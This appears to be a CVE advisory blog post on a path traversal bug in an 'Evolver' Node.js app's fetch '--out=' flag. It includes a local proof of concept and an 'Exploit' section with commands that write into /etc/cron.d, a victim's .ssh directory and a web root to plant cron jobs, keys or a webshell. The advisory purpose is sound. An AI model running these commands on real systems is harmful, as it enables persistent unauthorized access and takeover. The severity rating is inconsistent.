Evolver Application, Path Traversal Vulnerability, (no CVE – Medium)

Listen to this Post

The vulnerability exists in the `fetch` command handler within `index.js` at lines 752–767. When the `–out=` flag is provided, the code extracts the user-supplied path using `outFlag.slice(‘–out=’.length)` without any sanitization or validation. An attacker can supply a path containing `../` sequences, such as ../../../etc/cron.d, causing the application to write files to arbitrary filesystem locations. The `safeId` variable is sanitized with a regex replacement, but this sanitization only applies to the default path (when `–out=` is omitted). For user-controlled `–out=` paths, no validation occurs. The `fs.mkdirSync(outDir, { recursive: true })` then creates the directory (including parent directories via traversal) and subsequent file writes land inside the attacker-controlled outDir. This allows overwriting critical system files, planting cron jobs, modifying SSH authorized_keys, or replacing application code. The process privileges determine the extent of damage; if run as root or a high-privileged user, full system compromise follows.

dailycve form (3 words max per line):

Platform: Node.js app
Version: any (unpatched)
Vulnerability : path traversal write
Severity: high (medium?)
date: 2025-04-23

Prediction: Patch within 14d

What Undercode Say:

Identify vulnerable command usage
grep -rn "outFlag.slice('--out=')" index.js
Test path traversal locally
mkdir -p ./test-vuln
node -e "const fs=require('fs'); const out='../../../tmp/poc'; fs.mkdirSync(out,{recursive:true}); fs.writeFileSync(out+'/poc.txt','traversal');"
Monitor file writes outside allowed base
inotifywait -m -r --format '%w%f' /tmp/ | grep 'evolver'

Exploit:

Write to system cron directory (if write perms exist)
node index.js fetch malicious-skill --out=../../../etc/cron.d
Overwrite SSH authorized_keys of a user
node index.js fetch any-skill --out=../../../home/victim/.ssh
Plant webshell in web root
node index.js fetch skill --out=../../../var/www/html

Protection from this CVE

  1. Validate and sanitize the `–out=` path: resolve it with `path.resolve()` and check that it stays inside an intended base directory (e.g., skills/).

2. Use `path.join(baseDir, userInput)` after stripping `../` sequences.

  1. Run the application with least privilege (non-root user) to limit write impact.
  2. Apply vendor patch once released (monitor CVE database for updated package).

Impact

  • Arbitrary file write to any filesystem location → remote code execution via cron/webshell.
  • Overwrite configuration or binaries → privilege escalation or DoS.
  • Tamper with SSH keys → persistent unauthorized access.
  • In CI/CD pipelines: compromise secrets or inject malicious artifacts.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top